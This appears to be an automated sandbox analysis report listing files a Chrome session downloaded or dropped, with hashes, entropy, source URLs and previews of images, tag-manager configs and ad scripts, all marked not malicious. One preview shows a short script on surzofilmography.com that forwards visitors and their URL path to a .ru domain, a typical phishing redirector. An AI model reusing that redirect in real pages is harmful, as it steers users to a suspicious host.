                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.....v.v.................................................................! !,,;...........................................................! !,,;..........."..........9......................................................................,...;M..B."h..@H`.t..F"T!.*.TU(..2..j$.UV.N..N.....P:Z.CUj<........Z!..iB.TF..0.!.H...Q0f.%:-6KBn...[..H.1.i.....M.....Y...-.sw6tl.RlN..>...J.K@HN.kN...e"..&@.KM.S..5.:..`.9..(....%...*4E.q.R.0..a...."..g...Z.nU6...Q...,.mb.....()..e....@Z.i..)(#*.?y.(...%T". C........T...5T..J.U$...- .....F..@.s....!.[u...Z.U`........)...:.i.......j+r...B...6AA,....V....`4...W....HE..j$u..D..H.6F.Db.J.:..M..6...S..D.H.(.P..J....6.P..d..<...^e..KJ.!V :.J&......&.*N-+...4.`.....Pi...9H@q^...h..0i.h....ME.0...B.Sm..J.U.4.R..p....P.c 2Q6..BUC$G....Dr.&$..s..$....9.+..F.v .. ]..A).!(..F@.....TT..P1Eq.E.EID.Ta6..6..4..2..H..HaMHd.Cd)$2."..H......n.........H..t8.zc|i.'..n.........d...Vh..iA..0...Sl..........z.Hn.F..Q..>qdru...e1y..y..J..M...e
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):28
                                                                                                                                                                Entropy (8bit):3.7709424217485368
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5FD64B7E2C36B0C715F31D28B3E27CA8
                                                                                                                                                                SHA1:0BE198A9762F951297DBC2DA6E26BF7B3A8A3917
                                                                                                                                                                SHA-256:16EE8B58F0E3C1D1FDDC8B0AD3F1BCE551518EB9BEBE349329246005AD53789D
                                                                                                                                                                SHA-512:B13B1D32DEF0FFCBF9A89C0A45E7E5780FCE3DC14C4B25F90988A33A396C14A1FD8E91ADD7D8D827C782E6A5DD096242B4A7CADBAA7F7E6728117F0C1B353C79
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkKnK3FVGs2RRIFDUHqUa4=?alt=proto
                                                                                                                                                                Preview:ChMKEQ1B6lGuGgQICRgBGgQIZBgC
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):50297
                                                                                                                                                                Entropy (8bit):4.272494390623752
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:6456D197D494E7EE00DA27310D2F1993
                                                                                                                                                                SHA1:EB58FFB02961AF43CC7B99703F6BBEB46E380C6E
                                                                                                                                                                SHA-256:8B9D0D77FAB58E1E1EC4FD77F06ECEBEDF37E54AD7B3A3F0D6641DE0204FCAA9
                                                                                                                                                                SHA-512:7DC13B9C8F39A34CEE7E33539103EF17A1F33324E7F9E042F659FEC827A8F689A18C636D1EBE4E815DBBC7D700B52BF8C4FB74E8990CF05ED2467E126C357E36
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://js.adsrvr.org/up_loader.1.1.0.js
                                                                                                                                                                Preview:(function () {. "use strict";. // log related. let logLevel = null,. logCategory = "(TTD)";. const LOG_LEVELS = ["debug", "info", "warn", "error"];. let Logger = LOG_LEVELS.reduce(((e, t, n) => (e[t] = function () {. const e = "debug" === t ? "log" : t;. if (logLevel && console && "function" == typeof console[e]) {. const a = LOG_LEVELS.indexOf(logLevel.toString().toLocaleLowerCase());. if (!0 === logLevel || a > -1 && n >= a) {. for (var r = arguments.length, o = new Array(r), i = 0; i < r; i++) o[i] = arguments[i];. const [n, ...a] = [...o];. console[e](`${t.toUpperCase()} - ${logCategory} ${n}`, ...a). }. }. }, e)), {});.. function updateLogLevl(l) {. logLevel = l. }.. // config example:. // {. // "cssSelectors": ["input[type=email]"],. // "detectionSubject": ["email"],. // "detectionEventType": "onclick",. // "tri
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 340x270, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):36723
                                                                                                                                                                Entropy (8bit):7.985547886096411
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5BE1A34CC0B8DA14147B0D18272BBDBB
                                                                                                                                                                SHA1:EDA35B397AE5BC0648113941F0541AC3B714D8AF
                                                                                                                                                                SHA-256:DDBB7C5321069B5D4691A16528EF4D72097D03AA28347771FAC13A23C031244B
                                                                                                                                                                SHA-512:93264BF03B48274476BF9B262A27BE20C2EB565D4E089E44EDA3B7BC209C7C593F16BEDD615ECA9EA9654C805AA5BC48EB0526FC1A69205308D66A6301E3CFE2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.........................................................................! !,,;...........................................................! !,,;........T.."..........7......................................................................^w.[;KK..$..%9..GS...UH./n.UVZ..y..f.%../.....q.Gz......0...LL\H...7Fz.S2W.M6.m@eEM.+Sh..".s..*.bd..ZR..C..8O.q....0k... .=p...M....T.N.C..%.....}...... .. [i.y.]c.!..k.D.$.. ....rl.{.[.NQ...u..t.......x...mV.....vl.C...y!.[%....B..*...BCCi&.......+...r-P..>E$...L.c.......$P.v)z...LWC.].k(.>WG.r.S..h......`.y..8..C*.Hy.Y.=B-.KJ....AQv.*.C0...?.......y!.3WI".UTR!`...!......+..5.#k.&d....+...P...)W...3]|\.*.*~-cB"..4K...N....M.o.........Q./w.b..oP.....R...)..Nrw.uv...&.{.........Qr..3IT6..0..k.$.\.r.1Vp.N5P...i......?..rhJ..F.)......Qu..D.@.V.a#.rD....IRWs.gUe.8[..!a..nYI[$...3...P{.#..............gTxDJ.!....hm. Ci..TFK..f..t..7..jb^....JM......+....]......o......Y2.).w..R..4z*..|.z(Hq.....jk3.u,....]....H..u
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):42
                                                                                                                                                                Entropy (8bit):3.122714743434665
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:ACCBA0B69F352B4C9440F05891B015C5
                                                                                                                                                                SHA1:9D01CC5DC8E042C0D4AD6CFB8B3AC38E84A5EF9F
                                                                                                                                                                SHA-256:47043E4823A6C21A8881DE789B4185355330B5804629D23F6B43DD93F5265292
                                                                                                                                                                SHA-512:D3C4A5427BF645CC226106B0E8C28A76B0B91F50FA6D77E962A3B59B85BE2A0CFDB94EC0F40742F10C18025573D8FBFADECDDF60F4652BAE671F6031C02A7CB5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:GIF89a.............!.......,........@..D.;
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (65401)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):330224
                                                                                                                                                                Entropy (8bit):5.283259960085693
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:8E95C4D8776E15097083DD4D66AA1A42
                                                                                                                                                                SHA1:BC1394A0916D1CB811E6239FC90C1E1B8CA32CC4
                                                                                                                                                                SHA-256:782D6D1A4FF7CFEE0BD531BD28232E3AB575D0CFA04ABAD3945CB04BB5A61786
                                                                                                                                                                SHA-512:22E1B972B3731575152250D3414A0A8067A673D96C0755676A23A4C04F9B9F63B7805512588E7D9C22DD7AB2335F1B8A56A15D0AAE2DCF18CD268AC0254A6FA7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://www.etsy.com/ac/evergreenVendor/js/en-US/vendor_bundle.051a2557fd322e046abd.js
                                                                                                                                                                Preview:// For license information, please see: https://www.etsy.com/ac/evergreenVendor/js/en-US/vendor_bundle.051a2557fd322e046abd.js.LICENSE.var vendor_bundle_051a2557fd322e046abd;(()=>{var e={65:e=>{var t=function(e){"use strict";var t=Object.prototype;var r=t.hasOwnProperty;var n;var i="function"===typeof Symbol?Symbol:{};var o=i.iterator||"@@iterator";var a=i.asyncIterator||"@@asyncIterator";var u=i.toStringTag||"@@toStringTag";function s(e,t,r){Object.defineProperty(e,t,{value:r,enumerable:true,configurable:true,writable:true});return e[t]}try{s({},"")}catch(D){s=function(e,t,r){return e[t]=r}}function c(e,t,r,n){var i=t&&t.prototype instanceof y?t:y;var o=Object.create(i.prototype);var a=new j(n||[]);o._invoke=O(e,r,a);return o}e.wrap=c;function l(e,t,r){try{return{type:"normal",arg:e.call(t,r)}}catch(D){return{type:"throw",arg:D}}}var f="suspendedStart";var p="suspendedYield";var d="executing";var v="completed";var h={};function y(){}function m(){}function g(){}var b={};s(b,o,(function
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):371
                                                                                                                                                                Entropy (8bit):4.600540137157355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:97CF0FE353C517CEA6CB3E1F2E7EDFC9
                                                                                                                                                                SHA1:58D8EB24BFD5CA347B6A0A72894E6C8B6EAE198F
                                                                                                                                                                SHA-256:0E0C8CEDB72A7E5A3080203509132486E267E5D1B0C5C6EAE78AC16F7928FF01
                                                                                                                                                                SHA-512:F3D33FE997DC8FDFF9B122C208321F1DB35B2A6C2650C8EAC119A2A20FAE74874691340C3419283AE0914E5405D51E40BF787469B3A7A2B66A81A68B6E2009EB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://bat.bing.com/p/action/4020083.js
                                                                                                                                                                Preview:(function(w,d,c,k,a,b,t,e) {.. var cs = d.currentScript;.. if (cs) {.. var uo = cs.getAttribute('data-ueto');.. if (uo && w[uo] && typeof w[uo].setUserSignals === 'function') {.. w[uo].setUserSignals({'co': c, 'kc': k, 'at': a, 'bi': b, 'dt': t, 'ec': e});.. }.. }..})(window, document, 'us', false, false, false, false, false);..
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (2199)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):129796
                                                                                                                                                                Entropy (8bit):5.210430292599487
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:F804F62127E351B24C131D521B73A657
                                                                                                                                                                SHA1:5287AFCBBBDD5C62506EAE2BCFF359C5A7907812
                                                                                                                                                                SHA-256:FFACE13AE112A253E99FB74EB69FB02CF6698EEE1D8EF55F03FAE545680B128E
                                                                                                                                                                SHA-512:62468F5BE5D666FBA76BAD61C8B8CE489DD0327271A0EB22153C7B863590CA3F7E3D19BA9AF6C571DA1008D6A3B1632FB4FDE80D631C75EE492EA503D8805AE8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://cdn02.jotfor.ms/static/prototype.forms.js?v=3.3.57466
                                                                                                                                                                Preview:var Prototype={Version:'1.7',Browser:(function(){var ua=navigator.userAgent;var isOpera=Object.prototype.toString.call(window.opera)=='[object Opera]';return{IE:!!window.attachEvent&&!isOpera,IE9:('documentMode'in document)&&document.documentMode==9,IE10:('documentMode'in document)&&document.documentMode==10,Opera:isOpera,WebKit:ua.indexOf('AppleWebKit/')>-1,Gecko:ua.indexOf('Gecko')>-1&&ua.indexOf('KHTML')===-1,MobileSafari:/Apple.*Mobile/.test(ua)}})(),BrowserFeatures:{XPath:!!document.evaluate,SelectorsAPI:!!document.querySelector,ElementExtensions:(function(){var constructor=window.Element||window.HTMLElement;return!!(constructor&&constructor.prototype);})(),SpecificElementExtensions:(function(){if(typeof window.HTMLDivElement!=='undefined').return true;var div=document.createElement('div'),form=document.createElement('form'),isSupported=false;if(div['__proto__']&&(div['__proto__']!==form['__proto__'])){isSupported=true;}.div=form=null;return isSupported;})()},jsInlineEvents:['onab
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 300x300, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):13504
                                                                                                                                                                Entropy (8bit):7.988522920826498
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:4E1B8809C682EA1540D746C8ABA6C314
                                                                                                                                                                SHA1:80B4FCDABAF8DDAF6F9591DE4FE2567333136638
                                                                                                                                                                SHA-256:C4136F4F6EDCFA1156A8F2FDFCAA1E9024D677939DFB4C2E4F58706E6C8FF079
                                                                                                                                                                SHA-512:3E88B94838FA974DDB721CE1EA238987814B82F779D76F65A9518EA500B72BF5124018BAEB101E663409883F4E5BF8FDC9D6831E4DE780D6BA7206DCF9E884BB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/16469007/c/1440/1440/0/165/il/43f291/2603797076/il_300x300.2603797076_87xo.jpg
                                                                                                                                                                Preview:RIFF.4..WEBPVP8 .4.......*,.,.>E..D.......(.D..p.M.....I....7....m..y....|.:g._.....W..~........7.u.q.!.W...?./.}k..^]>._.?...{_......C.........o_.............>....{./.....;nO..........x.....C...e.?P.......w...?...............n.X....nb.RQ..=G............uG.4_....I..c..b...X......r..v.`...Z1z*.......L.Z.-...c#.KNZv...B..Z.4].!...j.a...4-..;P..?<..|..lY.&'.......vT.Il......5.1....p.b`,.".8.Ct.*..i.....B...1.M.....v.^.x.J.V.:.._4.G.......th~.o(...Yr...._.!g<m.x%.a8.........%.Z.W..6..de.K=......QTy.>.{...................[ 4.......4oJ....[..F<Lgc......< ..l..v.w.O..M.j.10n.~.deT..@..I.k.l..T......J./.pX..~fx.}....![I..{. ..........Q.T#}v.k...7..m....n...g.z..}.h..'K..I~..p|..j....-..e.........^..m....ks...ce.h.....;....es&>.f`.z.J...X..m.G.$c...:.....l....z.H.z....'S..(G:.8.7...v.:..Xz.5'.H.g]..M.......k...;Y....:u..nug.L.....T.y;P..._....j.xml...v.....0.....{...P........o........k2.....0.......Az..^.,r..[.....{..BR.O?..E..k\..l|z..ZJ...,C.wz=.i;.H.-P.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 340x270, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):8520
                                                                                                                                                                Entropy (8bit):7.974110164898546
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:5DCDBB878C7479EE0DB5C7463DBB9387
                                                                                                                                                                SHA1:7D0F251122179579E0C58C02BA3C19EF75A0DDAE
                                                                                                                                                                SHA-256:28E562D47614A95423023828565846839D70F18A6D916236023780E10CAB0752
                                                                                                                                                                SHA-512:092BD3767511D4358F97EC0314B8DAAD5828FEAA8B05A6DC0350C8B96B82ECAAB72FEA1FB59358F10D28E5B329655251594433CDBD8E2B5964E6B2181771AB1C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://i.etsystatic.com/36383707/r/il/3236b3/5824549940/il_340x270.5824549940_rbtz.jpg
                                                                                                                                                                Preview:RIFF@!..WEBPVP8 4!.......*T...>E..E....xEHh.D...%....r@....\}h..x..^X.q..p7....Y.L...@:Y..<..\.....nf..j....g.w..u...w...y....G@.....e.....s......."v~.hG.3nY..0.6|.+.A...........R...!z.;:.m-.8K.../..#\.$..7..).........!..f....O..&/.m....px....+....p....}sL..'{j{....../:z.E...l.6.(.pG..|....Z;..u.....c:m....k..Y......3^7aQ....E.@.(.....H0.vX.(......S......sNof....$..6..;Mb.w..."..$....g......C...q.L.....Y3... .&F.W.S%.....XQrJ%z..6..........*..u.2!..HQ.......8..8*.X..........O..4..%c.`.._...xF..Z.`.2.#(y.g...i.Lyw.if.^Zo...X....W0....5..^.v(&.............MMRxK)..j..... ..}....."Bq.?..<B..l.. p.....,...!&....r.f..c....:...f=..!.....p.b&..?s.r......b.\`.|.....h.5<../...R.7Aj..}.lg%N'.\ .z`..R..(.Q&T..*:CM.&....X..zvaa-..P..xe\K.#.`.[...z....;.[.6S..!.*H........C.,.P...0...>..........A..VB..~2I...+.......PW.].....lV.y/.H\...vF+..(..o....,...?..8..........\.>..2$`H........0y...AzZ..->.?.;....r!..C......`N.(..j(.cA.....3...93.Z...u..fe...uRc....~5@
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (7711)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):328779
                                                                                                                                                                Entropy (8bit):5.607655590843869
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:1347552DCEECA2663227611C44C644B7
                                                                                                                                                                SHA1:1ECF26B6EF25F9624D5C0F64801A4228CFCBB6F8
                                                                                                                                                                SHA-256:CB35FA31A9754E7A9CC755235C61724B1475FEBD144FDD49DAFD12493468B58D
                                                                                                                                                                SHA-512:8C65B46ACE1F8AC09F66CD76065E9D6036EC8992750DBF618EC043976676691C6A87A388586F635222FA6618FC700CCDC662EBAEC08F6BFBC5EE91A517AE246F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":16,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":16,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 500x333, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):52109
                                                                                                                                                                Entropy (8bit):7.966618767227534
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:11376FC99FB6EF5F1D5B5B0DC9272EFB
                                                                                                                                                                SHA1:972EAF3EC43B853F12BCA2316E7549C96C6B995B
                                                                                                                                                                SHA-256:110385906872AC07FA085BD87E74F19905749CFB83C638B9B455CDBACC1B6604
                                                                                                                                                                SHA-512:0CFD525195FFDAF3AF5692D0E8C441EEE2934FF3D0601C97F7DE382AB7A2CFD2A38F2D16401C04B731C4AB877C6AA0EBE60E845EB451BFF4CD89EAF95155077B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..A.h..<,.D..;...(.e^dv..pda.....Q...s..M.G.....sMDge..Q.wF..aO..SYm.#.wb6d.0......(..nK.Q.y......+....y.t......"...&..G...W..G.WH.f..c....3...Y......6...=...T.r.2...n.....HYf@K:.8... o.U..>.V{.U..fU...~. .a..H.J~.d......{S..|..N.Pt.g.Z...;[ig.o-.<..G.O.A...vM.}.....H...gq./...5..$h..K....t...M<?.$..?2....r...J4.,.rb.2..3.'.c..d..kO..|Gi?..LW(....$}.j...w'
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 59x59, segment length 16, progressive, precision 8, 500x250, components 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):33815
                                                                                                                                                                Entropy (8bit):7.964075348314633
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:15261B41DA835CA9CF250D2F9B5DB878
                                                                                                                                                                SHA1:E3E64CB874C0F9595D450AE3E6E73C550E67B23A
                                                                                                                                                                SHA-256:99B480A5DF1DA022405E8E0FC0CCDCBD02A77167451247F43FC2D2272E0541B6
                                                                                                                                                                SHA-512:2CA995927B458CDBB513A57F1C786FD7B25B6D7C27680868BF49C88431F9C3DFA337A7B5354B8F4CBE20E593B57B20B0307998362308EC9571D04406AEA135A8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:......JFIF.....;.;......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.............................................................&""&0-0>>T.......................................................&""&0-0>>T..........."..........7....................................................................<.3.>2..A$....!.`..........(......)...p...@D.Tp.oa..0k0..`IHr...3.........].b^5.^...m`P.c..P`...`d...:g .0.....b.....O...Sz.Y..x.H...@r....!...#..lW.m2HP..S..B0H.R.s;L.A@....Pb.(.a..M<Y...7V..V....X..7..6@.
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):228
                                                                                                                                                                Entropy (8bit):4.936226299109639
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:74EB9EE215528B8C455F460D0D95CC68
                                                                                                                                                                SHA1:072F2A7BA149B185A63C584E7E42B043D1BFF9BB
                                                                                                                                                                SHA-256:AEA271035C93AF6994EDBB46BB9BAD1985A177D9113DDD6474217B908D6F9881
                                                                                                                                                                SHA-512:52193797E5CA53A9C54D0CC7F53DFF2C7FA70A1B52A942DAAF21E9EBD978F713CC273805A2CD6F0D3D96932FB6A70C05FBE1AC79B415BC6AD8FCE9DBA13CB1DE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://surzofilmography.com/G/
                                                                                                                                                                Preview:<html>.. <body></body>.. <script>.. var u = window.location.href.lastIndexOf("/") + 1;.. var d = window.location.href.substring(u);.. window.location.replace("https://w4.ischievou8.ru/dr2/" + d);.. </script>..</html>
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 190x128, components 3
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):6287
                                                                                                                                                                Entropy (8bit):7.911544458209607
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:BD4838ED5F50E3810F780A04726A4ABB
                                                                                                                                                                SHA1:3DF116EF84BA4AD3D1F60923EE303C12D5E4845C
                                                                                                                                                                SHA-256:9FB7F0358E88B6C91DADA5D28BD6DA35B1002492A3B30B003E45FB5340238B2F
                                                                                                                                                                SHA-512:28280F439D91AE0EB332C58C44A4DC707353D071F5B03934AE3034E1C9F56D0093C24D50EA00D3A601576A030E1DFE1D31F8370E70A70732658CEF35F5B3921C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                URL:https://imgs.hcaptcha.com/XTnNZmOJmSf2tX6b8Vuqh_KPqHYRqEDZC9I5YuD2rJP4Ovt_kqJ_plLyCuL6E0MUIypC6qX3QiR2M0TUWb1G4rRsPRX6REYjiIKC4iSESLDNMNxcNAVAlENuTQAI5bGdM5tcfm703iwqkuMbP5hJ6NLNYcq6NSRPFg2Hr7gSycKNG89iY3h2gNMtaRwqQ_nybwjYyJqc2BerXwJwsMycwljVcFxKnfSzB7Z4LYYLyS5gcY3Z1Fb9ZoCdZaJjxrmE3qNb2rKGUCAji8ddZNQjVg0m6pDD3czKvUsN2k33sVHIcZ_US3fmCgxqowbU81VJCDb3AdsxCExBNEDKQuiDTUSQJhr-dsP7y-r4kYK6_BpZllbBVyil7f4FZRFgJDtLUvxco8gLFyhQMv6Fi6HFRuhYO8MYvRhc4dfOUgrXzY19PMiehQg_se
                                                                                                                                                                Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....Gn?J..h..Q.Q..b.o.@...p..,........j........._....V.G{.8..g..<.O~...z..Q...........J.d....JpL........q..>..*........V..`.NU....Wv...`.w.YD.[8..r.>....S..Z..a.+.N.B}=.x...IB?3..d..).....#.Fv..#8..*..K2..Y~......J_..*.vl..>.J+...E..z98.|...9..C.!........L..y...H.7.T.~.,X[>.$.z*.F...[..L......[M.Xb..}..*...4.mb.;.sO$..Q..xv[$,d....{..e.fRL. A..?..c.'..Xn.0.g.G
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (44394)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):413634
                                                                                                                                                                Entropy (8bit):5.564636469890069
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:CDD5D6BBF27226919C37593D6EA2947D
                                                                                                                                                                SHA1:98E063B0E5CAA08B8F5D341B604047D91D6323F6
                                                                                                                                                                SHA-256:88BE7579906A44B2DC5CCF677FEA182397C4783046D91DAA281F3790BBC0827A
                                                                                                                                                                SHA-512:4305C33F21EA72E707773E4161BBC9BE58F6576813A8ACC51B68A8794054A0180635A8B7A5CA31966D1000BB41EA0CD7F38B6F1E8808C06E278EE0C672F9CF6C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
                                                                                                                                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"612",. . "macros":[{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"isTestTransaction","vtp_defaultValue":"","vtp_setDefaultValue":true,"vtp_dataLayerVersion":1},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"isDeadReceipt"},{"function":"__v","vtp_name":"transactionId","vtp_dataLayerVersion":1},{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",4],"vtp_name":["template",["macro",5],".transactionId"]},{"function":"__jsm","vtp_javascript":["template","(function(){return "
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:C source, ASCII text, with very long lines (10929)
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):10989
                                                                                                                                                                Entropy (8bit):5.559075484568474
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:
                                                                                                                                                                MD5:D67EFF6F3E47FC2AB88094F79EEDD741
                                                                                                                                                                SHA1:7217356BF2E5E93013AC6902CB138FA3702C07C8
                                                                                                                                                                SHA-256:CC801CE0C56B23A865F8DB45353F3D6B22B4A29C3728CF05D4634E181CBED937
                                                                                                                                                                SHA-512:DF92FDB1C615F8E12CF7E32B2EF36E3DCD04C20CA438C3E1B3DC0446A3CD4DF8EFAE313EF650847B0CB511361CFCD09718E3FD8BA6C18B36BB380EE0DEF96FE2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:unknown
